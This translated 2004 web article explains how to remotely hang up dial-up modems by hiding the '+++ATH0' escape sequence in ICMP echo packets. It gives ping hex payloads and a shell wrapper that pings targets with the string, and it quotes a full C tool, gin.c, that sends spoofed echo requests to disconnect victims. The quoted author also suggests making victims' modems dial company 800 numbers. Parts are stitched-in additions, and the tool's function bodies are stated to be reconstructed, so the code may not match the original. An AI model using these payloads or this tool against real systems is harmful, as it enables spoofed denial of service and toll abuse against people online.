Remote Control of Modems
Date: 2004/10/8 16:47:00   Source: compiled by this site   Author: 蓝点
If you spend a lot of time on IRC or in chat rooms, you have probably been dropped offline in the middle of a lively conversation. You may think it is no big deal and simply reconnect, only for the same thing to happen again. Why? If your own modem is not at fault, someone is hitting you with one of the so-called "bombs". I have had this painful experience myself, so I gathered some material to share with everyone, covering questions such as: How do you manage a modem remotely? How do you send AT commands remotely? If I know someone's IP, how can I make them drop offline? How do I control a modem by hand? How do I protect myself from ATH attackers?
First, a brief look at how a packet travels across the Internet or a LAN. Suppose your IP address is xx.xx.xx.xx and the server you want to reach is yy.yy.yy.yy. You can use a simple C program to send some data to yy.yy.yy.yy:
C Program at Source --------------Router ---------------Daemon at Destination's Port
(xx.xx.xx.xx) (yy.yy.yy.yy)
That is the simplified picture; in more detail it looks like this:
C Program at source - Modem of Source - Router - Modem of Destination - Destination Daemon
So the packet passes through two modems, and a modem does not just forward the bytes its computer hands it: it also watches that same byte stream for its own commands.
A computer talks to its modem in the modem's command language, the AT ("attention") commands. Hayes developed the original command set, and most other manufacturers adopted it, which is why most modems are described as "Hayes compatible" and accept the AT command set.
————————————————————————————————————————————
Key point: the most basic AT command is the one that dials your ISP. When you press "Dial", your dial-up networking (DUN) software sends the modem a command of the form:
ATDT or ATDP phone-number
Breaking it down: AT gets the modem's attention, the next part selects the dialing method (DT for tone dialing, DP for pulse dialing), and the last part is the number to dial.
Note: to send commands to your modem, the modem has to be in command mode.
-------------------------------------------------------------------------------------------
A modem only accepts commands while it is in command mode. It starts in command mode by default; once a connection is up it is in online (data) mode, and everything its computer sends it is treated as data for the line, not as commands. This means that even if we know someone's IP address and send AT commands toward their modem, that modem will treat the AT text as ordinary data. For our commands to take effect, we must first switch the remote modem back into command mode.
Hayes-compatible modems provide an escape sequence for exactly this purpose: while online, a modem that sees the escape string +++ (the character stored in register S2) surrounded by a guard time of silence (register S12, one second by default) returns to command mode without dropping the connection. This is not a buffer overflow but documented modem behaviour. It becomes an attack because many non-Hayes modems avoid the Hayes guard-time patent with a time-independent escape sequence (TIES), or ship with a guard time near zero: they react to +++ followed directly by an AT command even when it arrives inline with ordinary data, which is exactly how it arrives inside a packet. So if you know someone's IP and their modem is of that kind, sending +++ followed by AT commands through it lets you manage that modem remotely: hang it up, change its settings, or make it dial a particular number.
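To make the guard-time condition concrete, here is a small model of the escape detector. It is an illustration added to this article, not code from the original, and its register semantics, timings and sample byte stream are constructed for the example: bytes arrive at the modem from its own computer with timestamps, S2 is the escape character, S12 the guard time, and the function reports whether the modem would drop into command mode and which command it would then execute.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* One byte arriving at the modem from its own computer, with an arrival time. */
typedef struct { unsigned ms; unsigned char byte; } ev_t;

/* The two S-registers that govern escape detection (constructed model). */
typedef struct {
    int s2;   /* escape character; Hayes modems disable the escape when S2 > 127 */
    int s12;  /* guard time in 1/50 s units (default 50 = 1 s); 0 = no guard time */
} modem_cfg_t;

/* Fill ev[] with the bytes of s arriving step_ms apart, starting at start_ms. */
size_t make_stream(ev_t *ev, unsigned start_ms, unsigned step_ms, const char *s)
{
    size_t i;
    for (i = 0; s[i]; i++) {
        ev[i].ms = start_ms + (unsigned)i * step_ms;
        ev[i].byte = (unsigned char)s[i];
    }
    return i;
}

/* Run the byte stream through a model of the Hayes escape detector.
 * Returns 1 if the modem drops from online to command mode and copies the
 * command line it then collects (up to the first CR) into cmd. */
int modem_run(const modem_cfg_t *cfg, const ev_t *ev, size_t n,
              unsigned end_silence_ms, char *cmd, size_t cmdlen)
{
    unsigned guard = (unsigned)cfg->s12 * 20;   /* 1/50 s = 20 ms */
    unsigned last = 0;
    int have_last = 0, plus = 0, armed = 0, online = 1;
    size_t ci = 0;

    cmd[0] = '\0';
    for (size_t i = 0; i < n; i++) {
        unsigned gap = have_last ? ev[i].ms - last : UINT_MAX;
        int quiet = guard == 0 || gap >= guard;  /* silence long enough for a guard */
        int tight = guard == 0 || gap <= guard;  /* arrived within the guard time */
        unsigned char b = ev[i].byte;

        if (!online) {                           /* command mode: collect until CR */
            if (b == '\r') { cmd[ci] = '\0'; return 1; }
            if (ci + 1 < cmdlen) cmd[ci++] = (char)b;
        } else if (armed) {                      /* "+++" seen, need trailing guard */
            if (quiet) {
                online = 0;                      /* escape complete: command mode */
                if (b == '\r') { cmd[ci] = '\0'; return 1; }
                if (ci + 1 < cmdlen) cmd[ci++] = (char)b;
            } else {
                armed = 0;                       /* data followed too soon: just data */
            }
        } else if (cfg->s2 <= 127 && b == (unsigned char)cfg->s2) {
            if (plus == 0) plus = quiet ? 1 : 0;          /* first '+' needs leading silence */
            else           plus = tight ? plus + 1 : (quiet ? 1 : 0);
            if (plus == 3) { armed = 1; plus = 0; }
        } else {
            plus = 0;
        }
        last = ev[i].ms;
        have_last = 1;
    }
    if (online && armed && (guard == 0 || end_silence_ms >= guard))
        online = 0;                              /* escape completed by trailing silence */
    cmd[ci] = '\0';
    return !online;
}

int main(void)
{
    ev_t ev[32];
    char cmd[16];
    modem_cfg_t dflt = { '+', 50 }, nogap = { '+', 0 }, off = { 255, 0 };
    /* Constructed stream: the attacker's string arrives inline, 10 ms per byte,
       with no silence around the "+++", as it would inside an echo reply. */
    size_t n = make_stream(ev, 0, 10, "GET /x+++ATH0\r");

    printf("S12=50 (1 s guard) : %s\n",
           modem_run(&dflt, ev, n, 0, cmd, sizeof cmd) ? "escaped" : "stayed online");
    printf("S12=0  (no guard)  : %s, command '%s'\n",
           modem_run(&nogap, ev, n, 0, cmd, sizeof cmd) ? "escaped" : "stayed online", cmd);
    printf("S2=255 (escape off): %s\n",
           modem_run(&off, ev, n, 0, cmd, sizeof cmd) ? "escaped" : "stayed online");
    return 0;
}
```

With the default one-second guard the inline "+++ATH0" is passed through as data; with S12=0 (or a TIES-style modem that ignores timing) the modem escapes and executes ATH0; with S2=255 the escape cannot be triggered at all, which is the hardening that the ATS2=255 ping pattern later in the article sends to your own modem.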
A simple example: H0 is the AT command that hangs up (puts the modem on-hook). Combined with the escape sequence it becomes:
+++ATH0
We will carry out the attack with a C program. Before that, a word on delivering an AT command with plain ping. Unfortunately this does not work from Windows, whose ping.exe has no option for setting the payload pattern; on *nix you use -p, which takes a hex string of up to 16 bytes that ping places in the ICMP data:
ping -c 5 -p 2b2b2b415453323d32353526574f310d ip
Decoded, that pattern is +++ATS2=255&WO1 followed by a carriage return: escape to command mode, set register S2 to 255 (which disables the escape character), save the settings with &W, and go back online with O1. It is a hardening command rather than an attack. A modem only inspects the bytes its own computer sends it, so the request you send passes through your own modem first: if your modem accepts an inline +++, this ping makes it disable the escape sequence on itself; if it enforces the guard time, the bytes are simply transmitted as data. If the options are unfamiliar, read the manual on a *nix box:
$>man ping
The following script sends +++ATH0 the same way (2b2b2b415448300d is the hex for +++ATH0 plus a carriage return). Run against any host it is a self-test: if your own connection drops, your modem is vulnerable. Run against a target whose modem is vulnerable, the echo reply carries the same bytes out through the target's modem and hangs it up, but only if your own modem has not already fallen for the request on its way out.
#!/bin/sh
ping -p 2b2b2b415448300d "$@"
Note: ATH0 does not work on every machine; it depends on the modem brand and on how its firmware handles the escape sequence.
——————————————————————————————————————————————
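The following added example (not part of the original article; the ICMP identifier, sequence number and the sample HTTP payload are made up for the example) shows what ping's -p argument actually carries and why the attack rides on the reply rather than the request, which is the mechanism the escape-sequence section above and the quoted explanation below both describe. It encodes and decodes -p patterns within ping's 16-byte limit, builds the ICMP echo request, reflects it the way the target's kernel does, and finally runs the kind of payload check a packet filter could apply.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PING_PAD_MAX 16   /* iputils and BSD ping take at most 16 pattern bytes */
#define ICMP_HDR     8    /* type, code, checksum, id, seq */

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode a "ping -p" hex pattern into bytes.  Returns the byte count, or -1
 * if the string is not even-length hex or exceeds ping's 16-byte limit. */
int pattern_decode(const char *hex, unsigned char *out, size_t outlen)
{
    size_t n = strlen(hex);
    if (n == 0 || n % 2 || n / 2 > PING_PAD_MAX || n / 2 > outlen) return -1;
    for (size_t i = 0; i < n; i += 2) {
        int hi = hexval(hex[i]), lo = hexval(hex[i + 1]);
        if (hi < 0 || lo < 0) return -1;
        out[i / 2] = (unsigned char)(hi << 4 | lo);
    }
    return (int)(n / 2);
}

/* Encode an AT string as a -p argument.  Returns -1 if it would not fit in
 * ping's 16 bytes (a longer command cannot be delivered with plain ping). */
int pattern_encode(const char *s, char *hex, size_t hexlen)
{
    size_t n = strlen(s);
    if (n > PING_PAD_MAX || hexlen < 2 * n + 1) return -1;
    for (size_t i = 0; i < n; i++)
        sprintf(hex + 2 * i, "%02x", (unsigned char)s[i]);
    return (int)n;
}

/* RFC 1071 one's-complement checksum as used by ICMP; it returns 0 over a
 * message whose checksum field is already correct. */
uint16_t icmp_cksum(const unsigned char *p, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; len -= 2, p += 2) sum += (uint32_t)(p[0] << 8 | p[1]);
    if (len) sum += (uint32_t)(p[0] << 8);
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Echo request (type 8) carrying data; returns the message length. */
size_t build_echo_request(uint16_t id, uint16_t seq,
                          const unsigned char *data, size_t dlen, unsigned char *buf)
{
    uint16_t ck;
    buf[0] = 8; buf[1] = 0; buf[2] = 0; buf[3] = 0;
    buf[4] = id >> 8; buf[5] = id & 0xff;
    buf[6] = seq >> 8; buf[7] = seq & 0xff;
    memcpy(buf + ICMP_HDR, data, dlen);
    ck = icmp_cksum(buf, ICMP_HDR + dlen);
    buf[2] = ck >> 8; buf[3] = ck & 0xff;
    return ICMP_HDR + dlen;
}

/* What the target's IP stack does with a valid echo request: type becomes 0,
 * the checksum is recomputed, and the data (the AT string) is copied back
 * unchanged.  Returns the reply length, or 0 if the request is malformed. */
size_t reflect_echo(const unsigned char *req, size_t len, unsigned char *rep)
{
    uint16_t ck;
    if (len < ICMP_HDR || req[0] != 8 || icmp_cksum(req, len) != 0) return 0;
    memcpy(rep, req, len);
    rep[0] = 0; rep[2] = 0; rep[3] = 0;
    ck = icmp_cksum(rep, len);
    rep[2] = ck >> 8; rep[3] = ck & 0xff;
    return len;
}

/* Detection check for a packet filter or IDS: does an echo payload carry
 * "+++" immediately followed by "AT" (case-insensitive)? */
int payload_has_escape(const unsigned char *p, size_t len)
{
    for (size_t i = 0; i + 5 <= len; i++)
        if (p[i] == '+' && p[i + 1] == '+' && p[i + 2] == '+' &&
            toupper(p[i + 3]) == 'A' && toupper(p[i + 4]) == 'T')
            return 1;
    return 0;
}

int main(void)
{
    /* The two patterns used in the article, decoded and then reflected. */
    const char *patterns[] = { "2b2b2b415448300d", "2b2b2b415453323d32353526574f310d" };
    unsigned char data[PING_PAD_MAX], req[ICMP_HDR + PING_PAD_MAX], rep[ICMP_HDR + PING_PAD_MAX];
    size_t len;
    int n = 0;

    for (int i = 0; i < 2; i++) {
        n = pattern_decode(patterns[i], data, sizeof data);
        if (n < 0) { printf("%s: invalid pattern\n", patterns[i]); return 1; }
        printf("%-34s -> %2d bytes: %.*s<CR>\n", patterns[i], n, n - 1, (const char *)data);
    }
    /* Constructed id/seq; this is what the target sends back and what its modem sees. */
    len = build_echo_request(0x1234, 1, data, (size_t)n, req);
    len = reflect_echo(req, len, rep);
    printf("reply: type %d, checksum %s, escape sequence in payload: %s\n", rep[0],
           icmp_cksum(rep, len) == 0 ? "ok" : "bad",
           payload_has_escape(rep + ICMP_HDR, len - ICMP_HDR) ? "yes" : "no");
    return 0;
}
```

The 16-byte limit is why the longer dial-out string in the quoted explanation (+++ATH0,,,DT5551212) cannot be sent with ping and needs a program that builds its own packets, and the reflection step is why filtering inbound echo requests, or simply not answering them, is enough to stop the ping variant.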
Below is a C program found on PacketStorm that carries out the attack with spoofed ICMP echo requests. The explanation and the code that follow are the original author's.
[ explanation ]
The way the exploit works is it hides escape/control sequences in an ICMP
echo_request packet (it contains the string +++ATH0). The +++ sends the
modem into escape mode (and if the guard time on the modem is set
ridiculously low) it will go into command mode and you can issue it an
ATH0 to hang up. It works on the reply, because it receives the
echo_request packet, then duplicates the packet with a new timestamp and
checksum, dest/source hosts and returns it to the sender; when it returns
it the string is sent to the modem, and thus hanging it up. There are a
few conditions that must be met for it to work (if you don't want to be
vulnerable to this, fix these!)
1) target computer must not filter ICMP echo_request and must know how to
reply to one if it gets one
2) target computer must be using a modem (you can't hang up DS3s, although
I suppose you could hang up telco return connections..if you can find one)
3) target computer must have a vulnerable modem (i.e. guard time is set
ridiculously low)
4) you have to be able to send spoofed packets (or..if you can't I guess
you can use your own address, but then the target knows where it came
from)
In my experimenting, I have also devised various fun ways to use this
program other than just nuking your buddy off IRC. In theory, it is
possible to modify the program to do fun stuff like make the target call
some number after it hangs up (i.e. +++ATH0,,,DT5551212) should make the
modem hang up, pause for 6 seconds then call 5551212..this is fun for
obvious reasons. Then the next variation I came up with is a smurf-like
implementation in which you could make a script to DoS a class C subnet,
with the number of your least favorite company; since most companies have
800 numbers, not only does this cause chaos to the phone bank, but also
costs ~$.30 per call...but I don't condone any of those ideas of course,
this is just for experimental/educational purposes only. If you fix your
modems, none of this is possible, so get off your ass and fix it.
script kiddiez: here is your code...
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE ---
/*
 * gin.c
 * jpester@engr.csulb.edu
 *
 * Sends spoofed ICMP echo requests whose data is "+++ATH0\r"; the victim's
 * echo reply carries the same bytes out through the victim's modem.
 * The header names and the bodies of usage(), banner(), get_progname(),
 * done(), gin() and in_chksum() were lost in extraction and are
 * reconstructed here from the declarations and the description above.
 */
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>

#define VERSION "1.2-05.05" /* fixed old compiler compatibility problems */
#define FRIEND "foo"

void usage( char *name );
void banner( void );
char *get_progname( char *fullname );
void done( int foo );
void gin( int sockfd, struct sockaddr_in sin, struct sockaddr_in din );
unsigned short in_chksum( u_short *ipbuf, int iplen );

int main( int argc, char **argv )
{
    struct hostent *sourceinfo, *destinfo;
    struct sockaddr_in sin, din;
    int sockfd, numpackets, i;
    char *target, *source;

    banner();
    if( argc < 4 )
        usage( get_progname( argv[0] ) );
    source = argv[1];               /* address to spoof as the sender */
    target = argv[2];               /* victim */
    numpackets = atoi( argv[3] );
    signal( SIGINT, done );

    memset( &sin, 0, sizeof( sin ) );
    if( ( sourceinfo = gethostbyname( source ) ) == NULL )
    {
        printf( "cannot resolve source host!\n" );
        exit( -1 );
    }
    memcpy( &sin.sin_addr, sourceinfo->h_addr, sourceinfo->h_length );
    sin.sin_family = AF_INET;

    memset( &din, 0, sizeof( din ) );
    if( ( destinfo = gethostbyname( target ) ) == NULL )
    {
        printf( "cannot resolve destination host!\n" );
        exit( -1 );
    }
    memcpy( &din.sin_addr, destinfo->h_addr, destinfo->h_length );
    din.sin_family = AF_INET;

    /* raw socket, we supply the IP header ourselves; needs root */
    if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 )
    {
        printf( "Cannot get raw socket, you must be root!\n" );
        exit( -1 );
    }
    printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) );
    printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) );
    printf( "Number\t\t\t: %d\n", numpackets );
    printf( "Have some gin sucka" );
    for( i = 0; i < numpackets; i++ )
        gin( sockfd, sin, din );
    printf( "\n\nsent %d packet%s...done\n", numpackets, ( numpackets > 1 ) ? "s" : "" );
    return 0;
}

void usage( char *name )
{
    printf( "usage: %s <spoofed source> <target> <number of packets>\n", name );
    exit( -1 );
}

void banner( void )
{
    printf( "gin v%s - greets to %s\n", VERSION, FRIEND );
}

char *get_progname( char *fullname )
{
    char *slash = strrchr( fullname, '/' );
    return slash ? slash + 1 : fullname;
}

void done( int foo )
{
    ( void )foo;
    printf( "\ninterrupted, exiting\n" );
    exit( 0 );
}

/* Build one spoofed IP/ICMP echo request whose data is the escape + hang-up
 * string, repeated so the modem gets several chances to see it, and send it.
 * ip_len/ip_off are given in network byte order (Linux raw sockets). */
void gin( int sockfd, struct sockaddr_in sin, struct sockaddr_in din )
{
    static const char payload[] = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r";
    char packet[ sizeof( struct ip ) + ICMP_MINLEN + sizeof( payload ) - 1 ];
    struct ip *iph = ( struct ip * )packet;
    struct icmp *icmph = ( struct icmp * )( packet + sizeof( struct ip ) );

    memset( packet, 0, sizeof( packet ) );
    iph->ip_hl  = sizeof( struct ip ) >> 2;
    iph->ip_v   = 4;
    iph->ip_len = htons( sizeof( packet ) );
    iph->ip_id  = htons( ( unsigned short )( rand() & 0xffff ) );
    iph->ip_ttl = 255;
    iph->ip_p   = IPPROTO_ICMP;
    iph->ip_src = sin.sin_addr;     /* the spoofed address */
    iph->ip_dst = din.sin_addr;
    iph->ip_sum = in_chksum( ( u_short * )iph, sizeof( struct ip ) );

    icmph->icmp_type = ICMP_ECHO;
    icmph->icmp_code = 0;
    icmph->icmp_id   = htons( ( unsigned short )getpid() );
    icmph->icmp_seq  = 0;
    memcpy( ( char * )icmph + ICMP_MINLEN, payload, sizeof( payload ) - 1 );
    icmph->icmp_cksum = in_chksum( ( u_short * )icmph, ICMP_MINLEN + sizeof( payload ) - 1 );

    if( sendto( sockfd, packet, sizeof( packet ), 0,
                ( struct sockaddr * )&din, sizeof( din ) ) < 0 )
        perror( "sendto" );
    usleep( 10000 );
}

/* Standard one's-complement checksum over iplen bytes */
unsigned short in_chksum( u_short *ipbuf, int iplen )
{
    unsigned long sum = 0;
    while( iplen > 1 ) { sum += *ipbuf++; iplen -= 2; }
    if( iplen == 1 ) sum += *( unsigned char * )ipbuf;
    sum = ( sum >> 16 ) + ( sum & 0xffff );
    sum += ( sum >> 16 );
    return ( unsigned short )~sum;
}